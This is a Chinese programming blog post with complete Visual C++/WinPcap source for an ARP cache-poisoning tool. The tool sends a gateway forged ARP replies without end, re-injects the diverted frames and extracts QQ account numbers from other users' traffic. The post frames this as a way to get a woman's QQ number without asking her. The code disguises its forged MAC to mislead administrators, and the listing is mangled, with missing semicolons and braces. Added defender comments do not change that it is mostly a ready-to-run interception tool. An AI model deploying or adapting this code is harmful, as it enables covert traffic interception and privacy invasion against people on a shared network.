基于visual c++之windows核心编程代码分析(47)实现交换网络的QQ号嗅探

当我们在一个交换网络里面,不知道别人的QQ号码是个很痛苦的事情。假如一个PLMM在上网,你却不知道她的QQ,也没有勇气去问,是个很可惜的事情。

至于我们搞编程的,可以通过交换机的数据交换,嗅探出QQ号,因为QQ数据里面唯独QQ号码不加密。


  1. #include "stdafx.h" 
  2. #include "pcap.h" 
  3. #include <stdio.h> 
  4. #include "Iphlpapi.h" 
  5. #include "protocol.h" 
  6.  
  7. #pragma comment(lib,"wpcap.lib") 
  8. #pragma comment(lib, "Iphlpapi.lib") 
  9. #pragma comment(lib,"wsock32.lib") 
  10. #define PCAP_OPENFLAG_PROMISCUOUS 1 
  11.  
  /* Process-wide state shared by the pcap_loop thread (packet_handler writes it)
     and MyThread (polls the two flags and writes dwDstIp), with no synchronization. */
  12. DWORD dwMyIp,dwGateIp,dwSubnet,dwDstIp; // local IP, default gateway IP, subnet mask (set but never read), target IP
  13. UCHAR uMyMac[6],uGateMac[6],uDstMac[6]; // 6-byte MACs; the last two are learned from ARP replies in packet_handler
  14. pcap_t *adhandle; // capture/injection handle opened in main
  15. int nCount = 0;//counts consecutive identical ARP replies from the gateway; its MAC is treated as confirmed once this reaches 3 (see packet_handler) 
  16. bool bGateMac = true // true while the gateway MAC is still unknown
  17. bool bDstMac = true // true while the target MAC is still unknown
  18.  
  19. void SendArpRequest(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uSrcMac[]); 
  20. int SendPacket(char *pBuffer, int nLen); 
  21.  
  22. /* 每次捕获到数据包时,libpcap都会自动调用这个回调函数 */ 
  /* WinPcap capture callback, installed by pcap_loop in main.
     ARP path: uses replies to this host's own requests to learn the gateway MAC
     (only after repeated identical replies) and the target MAC.
     IP path: for UDP datagrams from source port 8000 whose first QQHeader byte is
     0x02, prints the 4-byte number that follows; and any IP packet addressed to
     dwDstIp that arrived with a destination MAC other than the target's real one
     is rewritten to that MAC and re-injected.
     Defender note: the re-injected frame keeps the original source MAC except for
     its last byte (+1), and the ARP state it depends on is the kind of IP/MAC
     inconsistency Dynamic ARP Inspection and ARP monitoring are meant to catch. */
  23. void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data) 
  24.     ETHeader *pETHdr = (ETHeader *)pkt_data; // casts away const: the IP path below writes into the capture buffer
  25.     if(ntohs(pETHdr->type) == ETH_TYPE_ARP) 
  26.     { 
  27.         if(header->len < sizeof(ArpPacket)) return
  28.         ARPHeader *pArpHdr = (ARPHeader *)((char *)pkt_data+sizeof(ETHeader)); 
  29.         if(ntohs(pArpHdr->opcode) == ARPOP_REPLY) 
  30.         { 
  31.             if(pArpHdr->daddr == dwMyIp && pArpHdr->saddr == dwGateIp && bGateMac) // reply to us from the gateway IP while its MAC is unconfirmed
  32.             { 
  33.                 if(nCount == 0) 
  34.                 { 
  35.                     memcpy(uGateMac,pArpHdr->smac,6); // first reply: remember the candidate MAC
  36.                     nCount ++; 
  37.                 }else if(nCount == 3)//three matching replies already seen: accept the gateway MAC 
  38.                 { 
  39.                     bGateMac = false
  40.                     return
  41.                 }else
  42.                     if(!memcmp(uGateMac,pArpHdr->smac,6)) // same MAC as the candidate
  43.                     { 
  44.                         nCount ++; 
  45.                     }else
  46.                         nCount = 0; // a different MAC: start the count over
  47.                     } 
  48.                 } 
  49.                 SendArpRequest(dwGateIp,dwMyIp,uMyMac); // ask again; each reply drives one more round until confirmed
  50.             } 
  51.             if(pArpHdr->daddr == dwMyIp && pArpHdr->saddr == dwDstIp && bDstMac) // reply to us from the target IP
  52.             { 
  53.                 memcpy(uDstMac,pArpHdr->smac,6); // taken from the first reply, no confirmation rounds
  54.                 bDstMac = false
  55.             } 
  56.         } 
  57.     } 
  58.     if(ntohs(pETHdr->type) == ETH_TYPE_IP) 
  59.     { 
  60.         IpHeader *pIpHdr = (IpHeader *)((char*)pkt_data+sizeof(ETHeader)); 
  61.         if(pIpHdr->Protocol == PROTOCOL_UDP) 
  62.         { 
  63.             if(header->len < sizeof(ETHeader) + sizeof(IpHeader) + sizeof(UdpHeader)) return
  64.             UdpHeader *pUdpHdr = (UdpHeader *)((char*)pIpHdr+sizeof(IpHeader)); 
  65.             if(ntohs(pUdpHdr->SrcPort) == 8000) // UDP source port 8000 is treated as QQ traffic
  66.             { 
  67.                 QQHeader *pQQHdr = (QQHeader *)((char*)pUdpHdr+sizeof(UdpHeader)); 
  68.                 if(pQQHdr->Flag != 0x02) return;//not a QQ packet 
  69.                 UCHAR uQQ[4]; 
  70.                 memcpy(uQQ,pQQHdr->Data,4); 
  71.                 DWORD dwQQ = 0; 
  72.                 for(int i=0;i<4;i++) 
  73.                 { 
  74.                     dwQQ = dwQQ*256+uQQ[i]; // big-endian 32-bit number
  75.                 } 
  76.                 printf("找到IP:%s的QQ号:%u\n",inet_ntoa(*(in_addr*)&pIpHdr->DstAddr),dwQQ); 
  77.             } 
  78.         } 
  79.         if(pIpHdr->DstAddr == dwDstIp && memcmp(pETHdr->dhost,uDstMac,6))//destination IP is the sniffed host, but the destination MAC is not its real MAC 
  80.         { 
  81.             pETHdr->shost[5] ++;//the source MAC must not be the gateway's, otherwise the switch itself is spoofed and other hosts lose connectivity; the result differs from the real sender's MAC in its last byte, an observable artifact 
  82.             memcpy(pETHdr->dhost,uDstMac,6); 
  83.             SendPacket((char*)pkt_data,header->len); // re-inject the rewritten frame
  84.         } 
  85.     } 
  86.  
  87.  
  /* Injects nLen raw bytes on the adapter opened in main. Returns 1 on success
     and 0 when pcap_sendpacket reports failure; every caller in this file
     ignores the result. */
  88. int SendPacket(char *pBuffer, int nLen) 
  89.     if(pcap_sendpacket(adhandle,(UCHAR *)pBuffer,nLen)) return 0; // non-zero from pcap means error
  90.     return 1; 
  91.  
  /* Broadcasts an ARP request for dwDesIP, naming dwSrcIP/uSrcMac as the sender.
     Used to learn the gateway's and the target's MAC from their replies
     (handled in packet_handler). */
  92. void SendArpRequest(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uSrcMac[]) 
  93.     ArpPacket *pArpPacket = new ArpPacket; // fixed-size struct; heap allocation is not needed here
  94.     for(int i =0;i<6;i++) 
  95.         pArpPacket->eth.dhost[i] = 0xFF; // broadcast destination
  96.     memcpy(pArpPacket->eth.shost,uSrcMac,6); 
  97.     pArpPacket->eth.type = ntohs(ETH_TYPE_ARP); // ntohs used as htons: the 16-bit byte swap is symmetric
  98.     pArpPacket->arp.hrd = ntohs(ARPHRD_ETHER); 
  99.     pArpPacket->arp.eth_type = ntohs(ETH_TYPE_IP); 
  100.     pArpPacket->arp.maclen = 6; 
  101.     pArpPacket->arp.iplen = 4; 
  102.     pArpPacket->arp.opcode = ntohs(ARPOP_REQUEST); 
  103.     memcpy(pArpPacket->arp.smac,uSrcMac,6); 
  104.     pArpPacket->arp.saddr = dwSrcIP; 
  105.     memset(pArpPacket->arp.dmac,0,6); // target MAC is unknown in a request
  106.     pArpPacket->arp.daddr = dwDesIP; 
  107.     SendPacket((char*)pArpPacket,sizeof(ArpPacket)); // send result ignored
  108.     delete pArpPacket; 
  109.  
  /* Sends an unsolicited ARP reply directly to uDesMac stating that dwSrcIP is at
     uSrcMac. MyThread calls this in a loop against the gateway with a fabricated
     MAC for the target's IP, so this is the ARP-cache-poisoning primitive.
     Defender note: unsolicited replies, and sender IP/MAC pairs that contradict
     the DHCP-snooping binding table, are what Dynamic ARP Inspection and ARP
     monitoring tools flag; static ARP entries neutralise it on endpoints. */
  110. void SendArpReply(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uDesMac[], UCHAR uSrcMac[]) 
  111.     ArpPacket *pArpPacket = new ArpPacket; // fixed-size struct; heap allocation is not needed here
  112.     memcpy(pArpPacket->eth.dhost,uDesMac,6); // unicast to the host being poisoned
  113.     memcpy(pArpPacket->eth.shost,uSrcMac,6); 
  114.     pArpPacket->eth.type = ntohs(ETH_TYPE_ARP); // ntohs used as htons: the 16-bit byte swap is symmetric
  115.     pArpPacket->arp.hrd = ntohs(ARPHRD_ETHER); 
  116.     pArpPacket->arp.eth_type = ntohs(ETH_TYPE_IP); 
  117.     pArpPacket->arp.maclen = 6; 
  118.     pArpPacket->arp.iplen = 4; 
  119.     pArpPacket->arp.opcode = ntohs(ARPOP_REPLY); 
  120.     memcpy(pArpPacket->arp.smac,uSrcMac,6); // the claimed (fabricated) MAC for dwSrcIP
  121.     pArpPacket->arp.saddr = dwSrcIP; 
  122.     memcpy(pArpPacket->arp.dmac,uDesMac,6); 
  123.     pArpPacket->arp.daddr = dwDesIP; 
  124.     SendPacket((char*)pArpPacket,sizeof(ArpPacket)); // send result ignored
  125.     delete pArpPacket; 
  126.  
  /* Worker thread started by main. Phase 1: request the gateway MAC and poll
     bGateMac until packet_handler has confirmed it. Phase 2: read the target IP
     from stdin, request its MAC, poll bDstMac. Phase 3: read a send rate and,
     forever, send forged ARP replies to the gateway binding the target's IP to
     uMac, the target's MAC with bytes 2 and 3 swapped. The final return is
     unreachable.
     Defender note: the forged binding differs from the target's real MAC in
     exactly two bytes, so cross-checking the gateway's ARP cache against the
     switch's MAC table, or enabling Dynamic ARP Inspection, exposes it. */
  127. int WINAPI MyThread(LPVOID Param) 
  128. //  Sleep(100); 
  129.     SendArpRequest(dwGateIp,dwMyIp,uMyMac); // first probe; packet_handler re-requests on every reply
  130.     while(1) 
  131.     { 
  132.         if(bGateMac) // plain global cleared by the capture thread; no synchronization
  133.         { 
  134.             ::Sleep(100); // poll every 100 ms
  135.             continue
  136.         } 
  137.         break
  138.     } 
  139.     printf("网关MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n",uGateMac[0],uGateMac[1],uGateMac[2],uGateMac[3],uGateMac[4],uGateMac[5]); 
  140.     printf("输入要嗅探的IP地址:"); 
  141.     char ip[20]; 
  142.     scanf("%s",ip); 
  143.     dwDstIp = inet_addr(ip); 
  144.     SendArpRequest(dwDstIp,dwMyIp,uMyMac); 
  145.     while(1) 
  146.     { 
  147.         if(bDstMac) // same polling hand-off as above, for the target MAC
  148.         { 
  149.             ::Sleep(100); 
  150.             continue
  151.         } 
  152.         break
  153.     } 
  154.     printf("目标MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n",uDstMac[0],uDstMac[1],uDstMac[2],uDstMac[3],uDstMac[4],uDstMac[5]); 
  155.     printf("输入每秒发送欺骗包的个数:1-50\n"); 
  156.     int nSpeed; 
  157.     scanf("%d",&nSpeed); 
  158.     UCHAR uMac[6];  
  159.     uMac[0] = uDstMac[0]; 
  160.     uMac[1] = uDstMac[1]; 
  161.     uMac[2] = uDstMac[3]; 
  162.     uMac[3] = uDstMac[2];//swap the 3rd and 4th MAC bytes to confuse the administrator 
  163.     uMac[4] = uDstMac[4]; 
  164.     uMac[5] = uDstMac[5]; 
  165.     while(1) // never exits
  166.     { 
  167.         SendArpReply(dwGateIp,inet_addr(ip),uGateMac,uMac); // tells the gateway that the target IP (inet_addr(ip) == dwDstIp) is at uMac
  168.         Sleep(1000/nSpeed); // inter-packet delay for the requested packets-per-second rate
  169.     } 
  170.     return 0; 
  171.  
  /* Finds the adapter whose first listed IP address equals dwIp and records its
     address, MAC, mask and first gateway in the globals, printing them.
     Returns 1 when an adapter matched, 0 when none did, -1 when GetAdaptersInfo
     failed. The GlobalAlloc'd table is never freed on any path (the walk also
     overwrites the only pointer to it). */
  172. int GetNetConfig(DWORD dwIp) 
  173.     PIP_ADAPTER_INFO pAdapterInfo = NULL; 
  174.     ULONG ulLen = 0; 
  175.  
  176.     // size query: with a NULL buffer this call reports the required length in ulLen 
  177.     ::GetAdaptersInfo(pAdapterInfo,&ulLen); 
  178.     pAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen); // result not checked for NULL
  179.      
  180.     // fetch the local adapter table 
  181.     if(::GetAdaptersInfo(pAdapterInfo,&ulLen) ==  ERROR_SUCCESS) 
  182.     { 
  183.         while(pAdapterInfo != NULL) 
  184.         { 
  185.             if(dwIp == inet_addr(pAdapterInfo->IpAddressList.IpAddress.String)) // only the first entry of IpAddressList is compared
  186.             { 
  187.                 dwMyIp = dwIp; 
  188.                 memcpy(uMyMac,pAdapterInfo->Address,6); 
  189.                 dwSubnet = inet_addr(pAdapterInfo->IpAddressList.IpMask.String); 
  190. dwGateIp = inet_addr(pAdapterInfo->GatewayList.IpAddress.String); // first gateway only
  191.                 //              CEther::SetGateWayAddr(inet_addr(pAdapterInfo->GatewayList.IpAddress.String),""); 
  192.                 printf("本机IP地址为:%s\n本机MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n网关IP地址为:%s\n"
  193.                     pAdapterInfo->IpAddressList.IpAddress.String, 
  194.                     uMyMac[0],uMyMac[1],uMyMac[2],uMyMac[3],uMyMac[4],uMyMac[5], 
  195.                     pAdapterInfo->GatewayList.IpAddress.String); 
  196.                 return 1; 
  197.             } 
  198.             pAdapterInfo = pAdapterInfo->Next; 
  199.         } 
  200.         return 0; 
  201.     } 
  202.     return -1; 
  /* Entry point: list the WinPcap adapters, let the user pick one by number,
     open it in promiscuous mode, fill the network globals from the adapter's
     first address, start MyThread and then run pcap_loop on this thread until
     capture ends. */
  203. int main(int argc, char* argv[]) 
  204.     pcap_if_t *alldevs;  
  205.     pcap_if_t *d;  
  206.     int i = 0;  
  207.     char errbuf[PCAP_ERRBUF_SIZE];  
  208.      
  209.     /* Retrieve the device list from the local machine*/  
  210.     if (pcap_findalldevs(&alldevs, errbuf) == -1)   
  211.     {  
  212.         printf("Error in pcap_findalldevs_ex: %s\n", errbuf); // message names pcap_findalldevs_ex, but the call is pcap_findalldevs 
  213.         exit(1);  
  214.     }  
  215.      
  216.     /* Print the list */  
  217.     for (d = alldevs; d != NULL; d = d->next)  
  218.     {  
  219.         /* Print the device's name */  
  220.         printf("%d. %s", ++ i, d->name);  
  221.          
  222.         /* Print the device's description */  
  223.         if (d->description)  
  224.         {  
  225.             printf("(%s)\n", d->description);  
  226.         }  
  227.         else  
  228.         {  
  229.             printf("(No description available)\n");  
  230.         }  
  231.     }  
  232.      
  233.     if (i == 0)  
  234.     {  
  235.         printf("\nNo interfaces found! Make sure WinPcap is installed.\n");  
  236.         return -1;  
  237.     }  
  238.     printf("Enter the interface number (1-%d):",i); 
  239.     int nIdx; 
  240.     scanf("%d", &nIdx); 
  241.      
  242.     if(nIdx < 1 || nIdx > i) 
  243.     { 
  244.         printf("\nInterface number out of range.\n"); 
  245.         /* free the device list */ 
  246.         pcap_freealldevs(alldevs); 
  247.         return -1; 
  248.     } 
  249.      
  250.     /* advance d to the selected adapter (empty loop body) */ 
  251.     for(d=alldevs, i=0; i< nIdx-1 ;d=d->next, i++); 
  252.      
  253.     /* open the device */ 
  254.     if((adhandle= pcap_open_live(d->name,          // device name 
  255.         65536,            // snaplen; 65536 is enough to capture every packet in full on any link layer 
  256.         PCAP_OPENFLAG_PROMISCUOUS,    // promiscuous mode 
  257.         10,             // read timeout 
  258.         errbuf            // error buffer 
  259.         )) == NULL) 
  260.     { 
  261.         fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name); 
  262.         /* free the device list */ 
  263.         pcap_freealldevs(alldevs); 
  264.         return -1; 
  265.     } 
  266.      
  267.     printf("\nlistening on %s...\n", d->description); 
  268.      
  269.     GetNetConfig(((sockaddr_in *)(d->addresses->addr))->sin_addr.S_un.S_addr); // uses the adapter's first address and assumes it is IPv4; d->addresses is not checked for NULL and the return value is ignored
  270.     /* free the device list */ 
  271.     pcap_freealldevs(alldevs); 
  272.      
  273.     ::CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)MyThread,NULL,0,0); // thread handle discarded; MyThread and packet_handler share state only through the global flags
  274.     /* start capturing: 0 = run indefinitely; packet_handler executes on this thread */ 
  275.     pcap_loop(adhandle, 0, packet_handler, NULL); 
  276.     return 0; 

 

原文地址:http://blog.csdn.net/yincheng01/article/details/7214422
